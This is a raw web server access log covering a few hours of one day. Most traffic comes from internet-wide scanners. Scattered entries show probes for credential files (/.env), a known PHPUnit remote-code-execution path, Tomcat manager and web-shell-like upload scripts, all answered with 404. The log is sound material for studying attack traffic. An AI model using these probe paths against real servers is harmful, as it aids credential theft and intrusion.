64.62.197.225 - - [03/Feb/2024:01:25:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
64.62.197.85 - - [03/Feb/2024:01:26:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.41"
184.105.139.70 - - [03/Feb/2024:01:26:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0"
64.62.197.89 - - [03/Feb/2024:01:27:58 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15"
64.62.197.86 - - [03/Feb/2024:01:28:36 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.41"
184.105.139.70 - - [03/Feb/2024:01:28:52 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0"
184.105.139.70 - - [03/Feb/2024:01:30:00 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0"
64.62.197.224 - - [03/Feb/2024:01:30:24 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
64.62.197.223 - - [03/Feb/2024:01:31:36 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
185.224.128.55 - - [03/Feb/2024:01:42:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
167.94.138.126 - - [03/Feb/2024:01:43:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.126 - - [03/Feb/2024:01:43:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.126 - - [03/Feb/2024:01:43:35 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.126 - - [03/Feb/2024:01:43:36 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.216.150.221 - - [03/Feb/2024:01:45:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
66.45.237.154 - - [03/Feb/2024:01:46:04 +0100] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
64.62.197.203 - - [03/Feb/2024:01:53:01 +0100] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.97 - - [03/Feb/2024:01:54:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
65.49.20.69 - - [03/Feb/2024:01:57:16 +0100] "\x16\x03\x01" 501 318 "-" "-"
162.142.125.212 - - [03/Feb/2024:01:59:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.212 - - [03/Feb/2024:01:59:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.212 - - [03/Feb/2024:01:59:36 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.212 - - [03/Feb/2024:01:59:37 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
107.170.208.19 - - [03/Feb/2024:02:05:13 +0100] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
107.170.208.19 - - [03/Feb/2024:02:05:14 +0100] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
107.170.208.19 - - [03/Feb/2024:02:05:30 +0100] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
107.170.208.19 - - [03/Feb/2024:02:05:45 +0100] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
107.170.208.19 - - [03/Feb/2024:02:05:50 +0100] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
107.170.208.19 - - [03/Feb/2024:02:06:05 +0100] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
45.79.163.53 - - [03/Feb/2024:02:06:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
107.170.208.19 - - [03/Feb/2024:02:06:16 +0100] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
107.170.208.19 - - [03/Feb/2024:02:06:18 +0100] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
107.170.208.19 - - [03/Feb/2024:02:06:23 +0100] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
107.170.208.19 - - [03/Feb/2024:02:06:37 +0100] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
45.79.181.104 - - [03/Feb/2024:02:07:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
36.73.33.170 - - [03/Feb/2024:02:09:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
165.154.118.169 - - [03/Feb/2024:02:10:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 9_0_1) AppleWebKit/591.40 (KHTML, like Gecko) Chrome/98.0.298 Safari/537.36"
165.154.118.169 - - [03/Feb/2024:02:10:07 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 8_1_2; Win64; x64) AppleWebKit/567.38 (KHTML, like Gecko) Chrome/87.0.347 Safari/537.36"
165.154.118.169 - - [03/Feb/2024:02:10:07 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/546.36 (KHTML, like Gecko) Chrome/54.0.1566 Safari/537.36"
165.154.118.169 - - [03/Feb/2024:02:10:07 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/578.53 (KHTML, like Gecko) Chrome/99.0.100 Safari/537.36"
165.154.118.169 - - [03/Feb/2024:02:10:08 +0100] "GET /axis2-admin/ HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
165.154.118.169 - - [03/Feb/2024:02:10:08 +0100] "GET /axis2/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
165.154.118.169 - - [03/Feb/2024:02:10:09 +0100] "GET /axis2/axis2-admin/ HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
138.118.103.80 - - [03/Feb/2024:02:17:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
205.210.31.211 - - [03/Feb/2024:02:21:28 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
162.216.150.145 - - [03/Feb/2024:02:25:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
45.79.163.53 - - [03/Feb/2024:02:27:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
45.79.181.104 - - [03/Feb/2024:02:29:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
89.248.168.37 - - [03/Feb/2024:02:31:52 +0100] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
78.153.140.177 - - [03/Feb/2024:02:35:25 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
78.153.140.177 - - [03/Feb/2024:02:35:28 +0100] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
198.235.24.177 - - [03/Feb/2024:02:36:54 +0100] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.177 - - [03/Feb/2024:02:36:54 +0100] "\x16\x03\x01" 501 318 "-" "-"
107.170.236.5 - - [03/Feb/2024:02:46:27 +0100] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
107.170.236.5 - - [03/Feb/2024:02:46:42 +0100] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
107.170.236.5 - - [03/Feb/2024:02:46:50 +0100] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
107.170.236.5 - - [03/Feb/2024:02:46:53 +0100] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
107.170.236.5 - - [03/Feb/2024:02:46:56 +0100] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
107.170.236.5 - - [03/Feb/2024:02:47:00 +0100] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
45.79.163.53 - - [03/Feb/2024:02:47:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
107.170.236.5 - - [03/Feb/2024:02:47:18 +0100] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
107.170.236.5 - - [03/Feb/2024:02:47:24 +0100] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
107.170.236.5 - - [03/Feb/2024:02:47:53 +0100] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
107.170.236.5 - - [03/Feb/2024:02:47:57 +0100] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
146.19.24.23 - - [03/Feb/2024:02:51:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.142.182.85 - - [03/Feb/2024:02:52:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.23 - - [03/Feb/2024:02:56:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.23 - - [03/Feb/2024:02:57:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.52 - - [03/Feb/2024:02:58:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.52 - - [03/Feb/2024:02:58:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.52 - - [03/Feb/2024:02:58:55 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.52 - - [03/Feb/2024:02:58:55 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
146.19.24.23 - - [03/Feb/2024:03:00:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.142.182.85 - - [03/Feb/2024:03:01:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.225 - - [03/Feb/2024:03:03:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.225 - - [03/Feb/2024:03:03:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.225 - - [03/Feb/2024:03:03:56 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.225 - - [03/Feb/2024:03:03:57 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.216.149.180 - - [03/Feb/2024:03:09:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
167.94.146.52 - - [03/Feb/2024:03:12:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.146.52 - - [03/Feb/2024:03:12:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.52 - - [03/Feb/2024:03:12:31 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.146.52 - - [03/Feb/2024:03:12:31 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
45.142.182.85 - - [03/Feb/2024:03:14:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
198.74.56.46 - - [03/Feb/2024:03:17:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
45.79.181.251 - - [03/Feb/2024:03:20:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
5.196.102.73 - - [03/Feb/2024:03:23:27 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
146.19.24.23 - - [03/Feb/2024:03:25:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.23 - - [03/Feb/2024:03:26:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
176.97.210.231 - - [03/Feb/2024:03:30:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
104.248.81.198 - - [03/Feb/2024:03:32:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.33.87.154 - - [03/Feb/2024:03:35:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
45.33.80.243 - - [03/Feb/2024:03:35:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
174.89.189.178 - - [03/Feb/2024:03:36:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
45.142.182.85 - - [03/Feb/2024:03:36:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
78.153.140.175 - - [03/Feb/2024:03:37:00 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
78.153.140.175 - - [03/Feb/2024:03:37:02 +0100] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
45.79.163.53 - - [03/Feb/2024:03:37:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.155.90.118 - - [03/Feb/2024:03:37:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.76.92.22 - - [03/Feb/2024:03:40:22 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
45.79.168.172 - - [03/Feb/2024:03:41:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.155.90.220 - - [03/Feb/2024:03:42:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.99.83.161 - - [03/Feb/2024:03:42:26 +0100] "\x16\x03\x01" 501 318 "-" "-"
167.99.83.161 - - [03/Feb/2024:03:42:26 +0100] "\x16\x03\x01" 501 318 "-" "-"
167.99.83.161 - - [03/Feb/2024:03:42:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.99.83.161 - - [03/Feb/2024:03:42:26 +0100] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
167.99.83.161 - - [03/Feb/2024:03:42:26 +0100] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
167.99.83.161 - - [03/Feb/2024:03:42:26 +0100] "\x16\x03\x01" 501 318 "-" "-"
167.99.83.161 - - [03/Feb/2024:03:42:26 +0100] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.99.83.161 - - [03/Feb/2024:03:42:26 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.99.83.161 - - [03/Feb/2024:03:42:26 +0100] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.99.83.161 - - [03/Feb/2024:03:42:26 +0100] "GET /bundle.js HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.99.83.161 - - [03/Feb/2024:03:42:26 +0100] "GET /files/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.99.83.161 - - [03/Feb/2024:03:42:26 +0100] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.99.83.161 - - [03/Feb/2024:03:42:26 +0100] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.99.83.161 - - [03/Feb/2024:03:42:26 +0100] "GET /info.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.76.92.22 - - [03/Feb/2024:03:44:16 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
192.155.88.231 - - [03/Feb/2024:03:45:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.155.90.118 - - [03/Feb/2024:03:45:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
198.74.56.46 - - [03/Feb/2024:03:47:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
198.235.24.82 - - [03/Feb/2024:03:48:15 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
45.33.87.154 - - [03/Feb/2024:03:52:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
45.79.172.21 - - [03/Feb/2024:03:53:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.79.181.251 - - [03/Feb/2024:03:55:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
176.97.210.231 - - [03/Feb/2024:03:59:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.142.182.85 - - [03/Feb/2024:04:02:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
192.155.88.231 - - [03/Feb/2024:04:04:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
157.254.236.22 - - [03/Feb/2024:04:05:19 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
157.254.236.22 - - [03/Feb/2024:04:05:21 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
194.233.75.51 - - [03/Feb/2024:04:07:17 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
194.233.75.51 - - [03/Feb/2024:04:07:17 +0100] "GET /Phpinfo/profiler HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
194.233.75.51 - - [03/Feb/2024:04:07:18 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
194.233.75.51 - - [03/Feb/2024:04:07:18 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
45.33.87.154 - - [03/Feb/2024:04:07:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.155.90.118 - - [03/Feb/2024:04:07:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.79.172.21 - - [03/Feb/2024:04:07:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.142.182.85 - - [03/Feb/2024:04:08:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
69.164.217.245 - - [03/Feb/2024:04:08:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
159.89.239.252 - - [03/Feb/2024:04:10:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
185.13.165.141 - - [03/Feb/2024:04:11:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
185.180.143.72 - - [03/Feb/2024:04:14:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.72 - - [03/Feb/2024:04:14:44 +0100] "GET /webfig/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.79.181.223 - - [03/Feb/2024:04:15:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
5.196.102.67 - - [03/Feb/2024:04:15:44 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
79.133.57.24 - - [03/Feb/2024:04:18:41 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
198.74.56.46 - - [03/Feb/2024:04:19:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
172.104.210.105 - - [03/Feb/2024:04:20:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
45.79.172.21 - - [03/Feb/2024:04:20:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.94.138.36 - - [03/Feb/2024:04:27:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.36 - - [03/Feb/2024:04:27:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.36 - - [03/Feb/2024:04:27:11 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.36 - - [03/Feb/2024:04:27:11 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
198.235.24.202 - - [03/Feb/2024:04:27:58 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
176.97.210.231 - - [03/Feb/2024:04:29:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
89.248.168.37 - - [03/Feb/2024:04:31:47 +0100] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
45.79.181.104 - - [03/Feb/2024:04:37:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
